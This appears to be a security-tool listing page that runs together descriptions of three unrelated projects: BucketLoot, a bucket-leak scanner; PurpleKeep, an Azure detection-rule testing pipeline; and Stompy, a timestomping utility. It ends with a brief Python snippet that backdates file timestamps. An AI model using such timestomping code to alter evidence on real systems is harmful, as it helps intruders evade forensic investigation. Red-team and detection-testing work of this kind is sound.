Accidental sensitive file leaks are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with a list of 80+ unique regex signatures in vulnFiles.json which allows users to flag these sensitive files based on file names or extensions.
Dig Mode
Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or any other sensitive data? Dig Mode allows you to pass non-S3 targets and lets the tool scrape URLs from the response body for scanning.
Asset Extraction
Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs, subdomains, and domains that could be present in an exposed storage bucket, giving you a chance of discovering hidden endpoints and an edge over other traditional recon tools.
Searching
The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.
With the rapidly increasing variety of attack techniques and a simultaneous rise in the number of detection rules offered by EDRs (Endpoint Detection and Response) and custom-created ones, the need for constant functional testing of detection rules has become evident. However, manually re-running these attacks and cross-referencing them with detection rules is a labor-intensive task which is worth automating.
To address this challenge, I developed PurpleKeep, an open-source initiative designed to facilitate the automated testing of detection rules. Leveraging the capabilities of the Atomic Red Team project, which allows attacks to be simulated following MITRE TTPs (Tactics, Techniques, and Procedures), PurpleKeep enhances the simulation of these TTPs to serve as a starting point for evaluating the effectiveness of detection rules.
Automating the process of simulating one or multiple TTPs in a test environment comes with certain challenges, one of which is the contamination of the platform after multiple simulations. However, PurpleKeep aims to overcome this hurdle by streamlining the simulation process and facilitating the creation and instrumentation of the targeted platform.
Primarily developed as a proof of concept, PurpleKeep serves as an End-to-End Detection Rule Validation platform tailored for an Azure-based environment. It has been tested in combination with the automatic deployment of Microsoft Defender for Endpoint as the preferred EDR solution. PurpleKeep also provides support for security and audit policy configurations, allowing users to mimic the desired endpoint environment.
To facilitate analysis and monitoring, PurpleKeep integrates with Azure Monitor and Log Analytics services to store the simulation logs and allow further correlation with any events and/or alerts stored in the same platform.
TLDR: PurpleKeep provides an Attack Simulation platform to serve as a starting point for your End-to-End Detection Rule Validation in an Azure-based environment.
Requirements
The project is based on Azure Pipelines and requires the following to be able to run:
Azure Service Connection to a resource group as described in the Microsoft Docs
Assignment of the "Key Vault Administrator" Role for the previously created Enterprise Application
MDE onboarding script, placed as a Secure File in the Library of Azure DevOps and made accessible to the pipelines
Optional
You can provide a security and/or audit policy file that will be loaded to mimic your Group Policy configurations. Use the Secure File option of the Library in Azure DevOps to make it accessible to your pipelines.
Refer to the variables file for your configurable items.
Design
Infrastructure
Deploying the infrastructure uses the Azure Pipeline to perform the following steps:
Deploy Azure services:
Key Vault
Log Analytics Workspace
Data Connection Endpoint
Data Connection Rule
Generate SSH keypair and password for the Windows account and store in the Key Vault
Create a Windows 11 VM
Install OpenSSH
Configure and deploy the SSH public key
Install Invoke-AtomicRedTeam
Install Microsoft Defender for Endpoint and configure exceptions
Currently only the Atomics from the public repository are supported. The pipeline takes a technique ID as input, or a comma-separated list of techniques, for example:
T1059.003
T1027,T1049,T1003
The logs of the simulation are ingested into the AtomicLogs_CL table of the Log Analytics Workspace.
There are currently two ways to run the simulation:
A fresh infrastructure will be deployed only at the beginning of the pipeline, and all TTPs will be simulated on this instance. This is the fastest way to simulate and prevents onboarding a large number of devices; however, running a lot of simulations in the same environment risks contaminating it and making the simulations less stable and predictable.
TODO
Must have
Check if prerequisites have been fulfilled before executing the atomic
Provide the ability to import own group policy
Clean up Bicep templates and pipelines by using a master template (complete build)
Build a pipeline that runs techniques sequentially with reboots in between
Add Azure ServiceConnection to variables instead of parameters
Nice to have
MDE Off-boarding (?)
Automatically join and leave AD domain
Make the Atomics repository configurable
Deploy VECTR as part of the infrastructure and ingest results during simulation. Also see the VECTR API issue
Tune alert API call to Microsoft Defender for Endpoint (Microsoft.Security alertsSuppressionRules)
Add C2 infrastructure for manual or C2 based simulations
Issues
Atomics do not return whether a simulation succeeded or not
A PowerShell function to perform timestomping on specified files and directories. The function can modify timestamps recursively for all files in a directory.
Change timestamps for individual files or directories.
Recursively apply timestamps to all files in a directory.
Option to use specific credentials for remote paths or privileged files.
I've ported Stompy to C#, Python, and Go; the relevant versions are linked in this repo, each with their own README.
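For readers new to the underlying concept, here is a minimal timestomping sketch in Python (illustrative only, not Stompy's implementation; the target path is hypothetical):

import os
from datetime import datetime, timezone

target = r"C:\temp\report.docx"  # hypothetical file to timestomp
fake = datetime(2015, 1, 1, tzinfo=timezone.utc).timestamp()
os.utime(target, (fake, fake))   # sets the access and modification times
# The Windows creation time is not exposed via os.utime; setting it requires
# platform APIs (e.g. .NET/Win32), which is what the PowerShell function handles.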